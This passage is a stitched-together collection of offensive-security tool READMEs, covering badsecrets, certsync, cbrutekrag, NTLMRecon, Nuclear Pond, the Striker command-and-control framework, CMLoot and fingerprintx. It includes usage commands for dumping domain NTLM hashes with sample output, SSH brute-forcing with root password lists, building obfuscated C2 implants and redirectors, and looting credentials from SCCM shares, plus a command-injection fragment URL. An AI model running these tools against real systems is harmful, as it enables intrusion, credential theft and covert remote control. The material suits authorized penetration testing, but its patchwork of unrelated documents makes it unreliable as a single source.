"qAAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AdQg4AC4AMQAwABRhZGwcBykRPNQv++kTK0KePPqVVGgAAAAFAFNkYXRhXHicHYc7DkBQAATnIUqVa3jxLRzApxJBrxA18bmdw1l2k9nZG/Bcxxjt4/An3NnYOVlZOMRL7ld0NAQ9IzUTMy0DeUpMqkYkso+ZGFNiKbRW//Pyb0Guzwtozw4Q",
".eJxVjLsOAiEURP-F2hAuL8HSfr-BAPciq4ZNlt3K-O9KsoU2U8w5My8W4r7VsHdaw4zswoCdfrsU84PaAHiP7bbwvLRtnRMfCj9o59OC9Lwe7t9Bjb2OtbMkAEGQtQjekykmJy9JZIW-6CgUaCGsA6eSyV65s1Qya_xGKZrY-wPVYjdw:1ojOrE:bfOktjgLlUykwCIRIpvaTZRQMM3-UypscEN57ECtXis",
"eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo",
"dUEvRldLekFNcklGZ3ZSbU1XaHJ0ZGxsLzhYTHlNTW43T3BVN05kZXE3WUhQOVVKbVA3Rm5WaSs5eG5QQ1VIRVBzeDFNTnNpZ0xCM1FKbzFZTEJISzhaNzFmVGYzME0waDFURVpCYm5TQlJFRmRFclYzNUZhR3VuN29PMmlkVHBrRi8wb3AwZWgvWmxObkFOYnpkeHR1YWpWZ3lnN0Y4ZW9xSk9LNVlQd0U4MmFsbWtLZUI5VzkzRk M4YXBFWXBWLS15L00xME1nVFp2ZTlmUWcxZVlpelpnPT0=--7efe7919a5210cfd1ac4c6228e3ff82c0600d841",
"https://localhost/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&_hash=Xnsvx/yLVQaimEd1CfepgH0rEXr422JnRSn/uaCE3gs=",
"s%3A8FnPwdeM9kdGTZlWvdaVtQ0S1BCOhY5G.qys7H2oGSLLdRsEq7sqh7btOohHsaRKqyjV4LiVnBvc"
]
for test in tests:
r = check_all_modules(test)
if r:
print(r)
else:
print("Key not found!")
import requests
from badsecrets.base import carve_all_modules
### using python requests response object
res = requests.get(f"http://example.com/")
r_list = carve_all_modules(requests_response=res)
print(r_list)
### Using string
carve_source_text = """
<html>
<head>
<title>Test</title>
</head>
<body>
<p>Some text</p>
<div class="JWT_IN_PAGE">
<p>eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo</p>
</div>
</body>
</html>
"""
r_list = carve_all_modules(body=carve_source_text)
print(r_list)
Nothing would make us happier than getting a pull request with a new module! But the easiest way to contribute would be helping to populate our word lists! If you find publicly available keys help us make Badsecrets more useful by submitting a pull request to add them.
Requests for modules are always very welcome as well!
certsync is a new technique to dump NTDS remotely, but this time without DRSUAPI: it uses a golden certificate and UnPAC the hash. It works in several steps:
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb 5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Contrary to what we may think, the attack is not at all slower.
git clone https://github.com/zblurx/certsync
cd certsync
pip install .
or
pip install certsync
$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username] [-p password] [-hashes LMHASH:NTHASH]
[-no-pass] [-k] [-aesKey hex key] [-use-kcache] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver] [-dns-tcp] [-dc-ip ip address]
[-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]
Dump NTDS with golden certificates and PKINIT
options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-outputfile OUTPUTFILE
base output filename
CA options:
-ca-pfx pfx/p12 file name
Path to CA certificate
-ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP
authentication options:
-d domain.local, -domain domain.local
Domain name
-u username, -username username
Username
-p password, -password password
Password
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it
will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-use-kcache Use Kerberos authentication from ccache file (KRB5CCNAME)
-kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
connection options:
-scheme ldap scheme
-ns nameserver Nameserver for DNS resolution
-dns-tcp Use TCP instead of UDP for DNS queries
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
OPSEC options:
-ldap-filter LDAP_FILTER
ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
-template cert.pfx base template to use in order to forge certificates
-timeout timeout Timeout between PKINIT connection
-jitter jitter Jitter between PKINIT connection
-randomize Randomize certificate generation. Takes longer to generate all the certificates
DRSUAPI is more and more monitored and sometimes restricted by EDR solutions. Moreover, certsync does not require the use of a Domain Administrator account; it only requires a CA Administrator.
This attack needs:
Since we cannot PKINIT for users that are revoked, we cannot dump their hashes.
Some options were added to customize the behaviour of the tool:

- `-ldap-filter`: change the LDAP filter used to select usernames to certsync.
- `-template`: use an already delivered certificate to mimic it when forging user certificates.
- `-timeout` and `-jitter`: change the timeout between PKINIT authentication requests.
- `-randomize`: By default, every forged user certificate will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.

Penetration tests on SSH servers using dictionary attacks. Written in C.
brute krag means "brute force" in Afrikaans.
This tool is for ethical testing purposes only.
cbrutekrag and its owners can't be held responsible for misuse by users.
Users have to act as permitted by local law rules.
cbrutekrag uses libssh - The SSH Library (http://www.libssh.org/)
Requirements:

- `make`
- `gcc` compiler
- `libssh-dev`
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
make
make install
Requirements:

- `cmake`
- `gcc` compiler
- `make`
- `libssl-dev`
- `libz-dev`
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
bash static-build.sh
make install
$ cbrutekrag -h
_ _ _
| | | | | |
___ | |__ _ __ _ _| |_ ___| | ___ __ __ _ __ _
/ __|| '_ \| '__| | | | __/ _ \ |/ / '__/ _` |/ _` |
| (__ | |_) | | | |_| | || __/ <| | | (_| | (_| |
\___||_.__/|_| \__,_|\__\___|_|\_\_| \__,_|\__, |
OpenSSH Brute force tool 0.5.0 __/ |
(c) Copyright 2014-2022 Jorge Matricali |___/
usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
[-t THREADS] [-o OUTPUT.txt] [TARGETS...]
-h This help
-v Verbose mode
-V Verbose mode (sshlib)
-s Scan mode
-D Dry run
-P Progress bar
-T <targets> Targets file
-C <combinations> Username and password file
-t <threads> Max threads
-o <output> Output log file
-a Accepts non OpenSSH servers
-A Allow servers detected as honeypots.
cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24
Example combinations file (username and password separated by a space; `$BLANKPASS$` denotes an empty password):
root root
root password
root $BLANKPASS$
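For example, a hypothetical run combining the options documented above (16 threads, progress bar, results logged to a file):

```
cbrutekrag -T targets.txt -C combinations.txt -t 16 -P -o result.log
```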
NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.
The tool supports collecting metadata from the exposed NTLM authentication endpoints, including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motivations behind its development and how we are approaching more advanced metadata collection within Chariot.
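As a quick manual sanity check (not part of NTLMRecon; the URL below is a placeholder), you can confirm that an endpoint advertises NTLM by looking for the `WWW-Authenticate: NTLM` header on an unauthenticated request:

```
curl -sk -o /dev/null -D - https://autodiscover.contoso.com/EWS/ | grep -i "WWW-Authenticate"
```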
We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang, and we didn't want to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected.
The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.
go install github.com/praetorian-inc/NTLMRecon/cmd/NTLMRecon@latest
The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:
NTLMRecon -t https://autodiscover.contoso.com
The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:
NTLMRecon -t https://autodiscover.contoso.com -o json
Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:
{
"url": "https://autodiscover.contoso.com/EWS/",
"ntlm": {
"netbiosComputerName": "MSEXCH1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "na.contoso.local",
"dnsComputerName": "msexch1.na.contoso.local",
"forestName": "contoso.local"
}
}
$ NTLMRecon -t https://adfs.contoso.com -o json | jq
{
"url": "https://adfs.contoso.com/adfs/services/trust/2005/windowstransport",
"ntlm": {
"netbiosComputerName": "MSFED1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "corp.contoso.com",
"dnsComputerName": "MSEXCH1.corp.contoso.com",
"forestName": "contoso.com"
}
}
$ NTLMRecon -t https://autodiscover.contoso.com
https://autodiscover.contoso.com/Autodiscover
https://autodiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root
https://autodiscover.contoso.com/Autodiscover/Autodiscover.xml
https://autodiscover.contoso.com/EWS/
https://autodiscover.contoso.com/OAB/
https://autodiscover.contoso.com/Rpc/
Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:
[1] https://www.praetorian.com/blog/automating-the-discovery-of-ntlm-authentication-endpoints/
Nuclear Pond is used to leverage Nuclei in the cloud with unremarkable speed and flexibility, and to perform internet-wide scans for far less than a cup of coffee.
It leverages AWS Lambda as a backend to invoke Nuclei scans in parallel, offers the choice of storing JSON findings in S3 to query with AWS Athena, and is easily one of the cheapest ways you can execute scans in the cloud.
Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine, but run scans in parallel and against however many hosts you want. All you need to think about is the Nuclei command line flags you wish to pass to it.
To install Nuclear Pond, you need to configure the backend terraform module. You can do this by running `terraform apply` or by leveraging terragrunt.
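A minimal sketch of that workflow, assuming you have already cloned the terraform module and configured AWS credentials (the directory name is illustrative):

```
cd terraform       # directory containing the Nuclear Pond backend module
terraform init
terraform apply
```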
$ go install github.com/DevSecOpsDocs/nuclearpond@latest
You can either pass in your backend with flags or through environment variables. Use `-f` or `--function-name` to specify your Lambda function and `-r` or `--region` to specify the region. Below are the environment variables you can use:
- `AWS_LAMBDA_FUNCTION_NAME` is the name of your lambda function to execute the scans on
- `AWS_REGION` is the region your resources are deployed in
- `NUCLEARPOND_API_KEY` is the API key for authenticating to the API
- `AWS_DYNAMODB_TABLE` is the dynamodb table to store API scan states

Below are some of the flags you can specify when running `nuclearpond`. The primary flags you need are `-t` or `-l` for your target(s), `-a` for the nuclei args, and `-o` to specify your output. Nuclei args must be passed as a base64 encoded string, e.g. `-a $(echo -ne "-t dns" | base64)`.
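For example, instead of passing `-f` and `-r` on every run, the backend can be configured once per shell (the function name below is the one used in the example that follows):

```
export AWS_LAMBDA_FUNCTION_NAME=jwalker-nuclei-runner-function
export AWS_REGION=us-east-1
```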
Below are the subcommands you can execute within nuclearpond.
To run the `run` subcommand: `nuclearpond run -t devsecopsdocs.com -r us-east-1 -f jwalker-nuclei-runner-function -a $(echo -ne "-t dns" | base64) -o cmd -b 1`, in which the target is `devsecopsdocs.com`, the region is `us-east-1`, the lambda function name is `jwalker-nuclei-runner-function`, the nuclei arguments are `-t dns`, the output is `cmd`, and `-b 1` executes one function with a batch of one host.
$ nuclearpond run -h
Executes nuclei tasks in parallel by invoking lambda asynchronously
Usage:
nuclearpond run [flags]
Flags:
-a, --args string nuclei arguments as base64 encoded string
-b, --batch-size int batch size for number of targets per execution (default 1)
-f, --function-name string AWS Lambda function name
-h, --help help for run
-o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd")
-r, --region string AWS region to run nuclei
-s, --silent silent command line output
-t, --target string individual target to specify
-l, --targets string list of targets in a file
-c, --threads int number of threads to run lambda functions, default is 1 which will be slow (default 1)
The terraform module by default downloads the templates on execution and also adds them as a layer. The variables used to download templates rely on the terraform GitHub provider to fetch the release zip. The folder from the zip is placed under `/opt`. Since Nuclei downloads templates at run time this is not strictly necessary, but to improve performance you can specify, for example, `-t /opt/nuclei-templates-9.3.4/dns` to execute templates from the downloaded zip. To use your own templates you must reference a release; when doing so on your own repository you must set the corresponding variables in the terraform module (`github_token` is not required if your repository is public).
If you have specified `s3` as the output, your findings will be stored in S3. The fastest way to get at them is with Athena. Assuming you set up the terraform module as your backend, all you need to do is query them directly through Athena. You may have to configure query results if you have not done so already.
select
*
from
nuclei_db.findings_db
limit 10;
To dig into queries a little deeper, here is a quick example. In the select statement we drill down into the `info` column, the `"matched-at"` column must be in double quotes due to the `-` character, and we search only for high and critical findings generated by Nuclei.
SELECT
info.name,
host,
type,
info.severity,
"matched-at",
info.description,
template,
dt
FROM
"nuclei_db"."findings_db"
where
host like '%devsecopsdocs.com'
and info.severity in ('high','critical')
The backend infrastructure is contained entirely within the terraform module. I strongly recommend reading the readme associated with it, as it contains some important notes.
Striker is a simple Command and Control (C2) program.
This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.
A) Agents
B) Backend / Teamserver
C) User Interface
Clone the repo:
$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker
The codebase is divided into 4 independent sections;
This handles all server-side logic for both operators and agents. It is a NodeJS application made with:
- `express` - For the REST API.
- `socket.io` - For web socket communication.
- `mongoose` - For connecting to MongoDB.
- `multer` - For handling file uploads.
- `bcrypt` - For hashing user passwords.

The source code is in the `backend/` directory. To set up the server:
Striker uses MongoDB as its backend database to store all important data. You can install it locally on your machine using this guide for debian-based distros, or create a free instance with MongoDB Atlas (a database-as-a-service platform).
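If you just want a quick local instance for testing, one common shortcut (not from the original guide, purely illustrative) is to run MongoDB in Docker:

```
docker run -d --name striker-mongo -p 27017:27017 mongo
```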
$ cd backend
$ npm install
$ mkdir static
You can use this folder to host static files on the server. This should also be where your `UPLOAD_LOCATION` is set to in the `.env` file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path `/static/`.
Create a `.env` file. NOTE: Values between `<` and `>` are placeholders; replace them with appropriate values (including the `<>`). For fields that require random strings, you can generate them easily using:
$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>
Note that `SSL_KEY` and `SSL_CERT` are optional. If either is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.
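If you do want the backend itself to terminate TLS, one option (purely illustrative; any valid key/cert pair works) is to generate a self-signed pair and point `SSL_KEY` and `SSL_CERT` at it:

```
openssl req -x509 -newkey rsa:2048 -nodes -days 365 \
    -keyout key.pem -out cert.pem -subj "/CN=c2.striker.local"
```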
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000
This is the web UI used by operators. It is a single-page web application written in Svelte, and the source code is in the `frontend/` directory.
To set up the frontend:
$ cd frontend
$ npm install
Create a `.env` file with the variable `VITE_STRIKER_API` set to the full URL of the C2 server as configured above:
VITE_STRIKER_API=https://c2.striker.local
$ npm run build
The above will compile everything into a static web application in the `dist/` directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like Python's:
$ cd dist
$ python3 -m http.server 8000
Click the `Register` button and sign up using the registration key (the `REGISTRATION_KEY` set in `backend/.env`). This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually; afterwards you can upgrade and downgrade other accounts in the `Users` tab of the web UI.
To create your first admin account, connect to the backend database, then update the `users` collection and set the `admin` field of the target user to `true`. There are different ways you can do this. If you have `mongo` available in your CLI, you can do it using:
$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})
You should get the following response if it works:
{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }
You can now login :)
A) Dumb Pipe Redirection
A dumb pipe redirector written for Striker is available at `redirector/redirector.py`. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the `INSECURE_SSL` macro in the C agent).
The following example listens on port `443` on all interfaces and forwards to `c2.example.org` on port `443`:
$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...
B) Nginx Reverse Proxy as Redirector
$ sudo apt install nginx
Create a new site config (e.g. `/etc/nginx/sites-available/striker`) using the template below.
Placeholders:
- `<domain-name>` - Your server's FQDN; it should match the one in your SSL cert.
- `<ssl-cert>` - The SSL cert file to use.
- `<ssl-key>` - The SSL key file to use.
- `<c2-server>` - The full URL of the C2 server to forward requests to.

WARNING: `client_max_body_size` should be at least as large as the size defined by `MAX_UPLOAD_SIZE` in your `backend/.env` file, or uploads of large files will fail.
server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;
location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
$ sudo service nginx restart
Your redirector should now be up and running on port `443`, and can be tested using (assuming your FQDN is `striker.local`):
$ curl https://striker.local
If it works, you should get the 404 response used by the backend, like:
{"error":"Invalid route!"}
A) The C Agent
These are the implants used by Striker. The primary agent is written in C, and is located in `agent/C/`. It supports both Linux and Windows hosts. The Linux agent depends externally on `libcurl`, which you will find installed on most systems.
The Windows agent does not have an external dependency. It uses `wininet` for comms, which I believe is available on all Windows hosts.
Assuming you're on a 64-bit host, the following will build for 64-bit hosts:
$ cd agent/C
$ mkdir bin
$ make
To build for 32-bit on a 64-bit host:
$ sudo apt install gcc-multilib
$ make arch=32
The above compiles everything into the `bin/` directory. You will need only two files to generate working implants:
- `bin/stub` - The agent stub that will be used as a template to generate working implants.
- `bin/builder` - What you will use to patch the agent stub and generate working implants.

The builder accepts the following arguments:
$ ./bin/builder
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>
Where:
- `<url>` - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
- `<auth_key>` - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
- `<delay>` - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
- `<stub>` - The stub file to read, `bin/stub` in this case.
- `<outfile>` - The output filename of the new implant.

Example:
$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
You will need MinGW for this. The following will install the 32- and 64-bit Windows dev environments:
$ sudo apt install mingw-w64
Build for 64 bit;
$ cd agent/C
$ mkdir bin
$ make target=win
To compile for 32-bit:
$ make target=win arch=32
This will compile everything into the `bin/` directory, and you will have the stub and the builder as `bin\stub.exe` and `bin\builder.exe`, respectively.
B) The Python Agent
Striker also comes with a self-contained Python agent (tested on Python 2.7.16 and 3.7.3). This is located at `agent/python/`. Only the most basic features are implemented in this agent. It is useful for hosts that can't run the C agent but have Python installed.
There are two files in this directory:
- `stub.py` - The payload stub to pass to the builder.
- `builder.py` - What you'll be using to generate an implant.

Usage example:
$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py
After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!
If you like the project, consider helping me turn coffee into code!
CMLoot was created to easily find interesting files stored on System Center Configuration Manager (SCCM/CM) SMB shares. The shares are used for distributing software to Windows clients in Windows enterprise environments and can contain scripts/configuration files with passwords, certificates (pfx), etc. Most SCCM deployments are configured to allow all users to read the files on the shares; sometimes access is limited to computer accounts.
The Content Library of SCCM/CM has a "complex" (annoying) file structure which CMLoot will untangle for you: https://techcommunity.microsoft.com/t5/configuration-manager-archive/understanding-the-configuration-manager-content-library/ba-p/273349
Essentially, the DataLib folder contains .INI files named after the original filename plus .INI. Each .INI file contains a hash of the file, and the file itself is stored in the FileLib in the format <folder name: first 4 chars of the hash>\<full hash>.
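For illustration only (the hash below is made up), the mapping between the two folders looks roughly like this:

```
DataLib\SC100001.1\x86\MigApp.xml.INI   # descriptor: <original filename>.INI, contains the file hash
FileLib\4D5A\4D5A9F...                  # actual content, stored as <first 4 chars of hash>\<full hash>
```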
It is possible to apply access control to packages in CM. However, this only protects the folder containing the file descriptors (DataLib), not the actual files themselves. During inventory, CMLoot records any package that it can't access (access denied) to the file _noaccess.txt. Invoke-CMLootHunt can then use this file to enumerate the actual files that the access control is trying to protect.
Microsoft Defender for Endpoint (EDR) or other security mechanisms might trigger because the script parses a lot of files over SMB.
Find CM servers by searching for them in Active Directory or by fetching this registry key on a workstation with System Center installed:
(Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\SMS\DP -Name ManagementPoints).ManagementPoints
There may be multiple CM servers deployed, and they can contain different files, so be sure to find all of them.
Then you need to create an inventory file, which is just a text file containing references to file descriptors (.INI). The following command will parse all .INI files on the SCCM server to create a list of available files.
PS> Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
Then use the inventory file created above to download files of interest:
Select files using GridView (mileage may vary with large inventory files):
PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -GridSelect
Download a single file by copying a line from the inventory text:
PS> Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
Download all files with a certain file extension:
PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension ps1
Files will by default be downloaded to CMLootOut in the folder from which you execute the script; this can be changed with the -OutFolder parameter. Files are saved in the format (folder: file extension)\(first 4 chars of hash)_original filename.
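For example (the hash prefix is hypothetical), a downloaded file might end up as:

```
CMLootOut\xml\4D5A_MigApp.xml
```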
Hunt for files that CMLootInventory found inaccessible:
Invoke-CMLootHunt -SCCMHost sccm -NoAccessFile sccmfiles_noaccess.txt
Bulk extract MSI files:
Invoke-CMLootExtract -Path .\CMLootOut\msi
Run inventory, scanning available files:
Select files using GridSelect:
Hunt "inaccessible" files and MSI extract:
Tomas Rzepka / WithSecure
`fingerprintx` is a utility similar to httpx that also supports fingerprinting services such as RDP, SSH, MySQL, PostgreSQL, Kafka, etc. `fingerprintx` can be used alongside port scanners like Naabu to fingerprint a set of ports identified during a port scan. For example, an engineer may wish to scan an IP range and then rapidly fingerprint the service running on all the discovered ports.
SERVICE | TRANSPORT | SERVICE | TRANSPORT |
---|---|---|---|
HTTP | TCP | REDIS | TCP |
SSH | TCP | MQTT3 | TCP |
MODBUS | TCP | VNC | TCP |
TELNET | TCP | MQTT5 | TCP |
FTP | TCP | RSYNC | TCP |
SMB | TCP | RPC | TCP |
DNS | TCP | OracleDB | TCP |
SMTP | TCP | RTSP | TCP |
PostgreSQL | TCP | MQTT5 | TCP (TLS) |
RDP | TCP | HTTPS | TCP (TLS) |
POP3 | TCP | SMTPS | TCP (TLS) |
KAFKA | TCP | MQTT3 | TCP (TLS) |
MySQL | TCP | RDP | TCP (TLS) |
MSSQL | TCP | POP3S | TCP (TLS) |
LDAP | TCP | LDAPS | TCP (TLS) |
IMAP | TCP | IMAPS | TCP (TLS) |
SNMP | UDP | Kafka | TCP (TLS) |
OPENVPN | UDP | NETBIOS-NS | UDP |
IPSEC | UDP | DHCP | UDP |
STUN | UDP | NTP | UDP |
DNS | UDP |
From Github
go install github.com/praetorian-inc/fingerprintx/cmd/fingerprintx@latest
From source (go version > 1.18)
$ git clone git@github.com:praetorian-inc/fingerprintx.git
$ cd fingerprintx
# with go version > 1.18
$ go build ./cmd/fingerprintx
$ ./fingerprintx -h
Docker
$ git clone git@github.com:praetorian-inc/fingerprintx.git
$ cd fingerprintx
# build
docker build -t fingerprintx .
# and run it
docker run --rm fingerprintx -h
docker run --rm fingerprintx -t praetorian.com:80 --json
fingerprintx -h
The `-h` option will display all of the supported flags for `fingerprintx`.
Usage:
fingerprintx [flags]
TARGET SPECIFICATION:
Requires a host and port number or ip and port number. The port is assumed to be open.
HOST:PORT or IP:PORT
EXAMPLES:
fingerprintx -t praetorian.com:80
fingerprintx -l input-file.txt
fingerprintx --json -t praetorian.com:80,127.0.0.1:8000
Flags:
--csv output format in csv
-f, --fast fast mode
-h, --help help for fingerprintx
--json output format in json
-l, --list string input file containing targets
-o, --output string output file
-t, --targets strings target or comma separated target list
-w, --timeout int timeout (milliseconds) (default 500)
-U, --udp run UDP plugins
-v, --verbose verbose mode
The `fast` mode will only attempt to fingerprint the default service associated with each target's port. For example, if `praetorian.com:8443` is the input, only the `https` plugin will be run. If `https` is not running on `praetorian.com:8443`, there will be NO output. Why do this? It's a quick way to fingerprint most of the services in a large list of hosts (think the 80/20 rule).
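For example, fast mode can be enabled with the `-f`/`--fast` flag from the help output above, typically against a target list:

```
$ fingerprintx -f -l input-file.txt
```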
With one target:
$ fingerprintx -t 127.0.0.1:8000
http://127.0.0.1:8000
By default, the output is in the form `SERVICE://HOST:PORT`. To get more detailed service output, specify JSON with the `--json` flag:
$ fingerprintx -t 127.0.0.1:8000 --json
{"ip":"127.0.0.1","port":8000,"service":"http","transport":"tcp","metadata":{"responseHeaders":{"Content-Length":["1154"],"Content-Type":["text/html; charset=utf-8"],"Date":["Mon, 19 Sep 2022 18:23:18 GMT"],"Server":["SimpleHTTP/0.6 Python/3.10.6"]},"status":"200 OK","statusCode":200,"version":"SimpleHTTP/0.6 Python/3.10.6"}}
Pipe in output from another program (like naabu):
$ naabu 127.0.0.1 -silent 2>/dev/null | fingerprintx
http://127.0.0.1:8000
ftp://127.0.0.1:21
Run with an input file:
$ cat input.txt | fingerprintx
http://praetorian.com:80
telnet://telehack.com:23
# or if you prefer
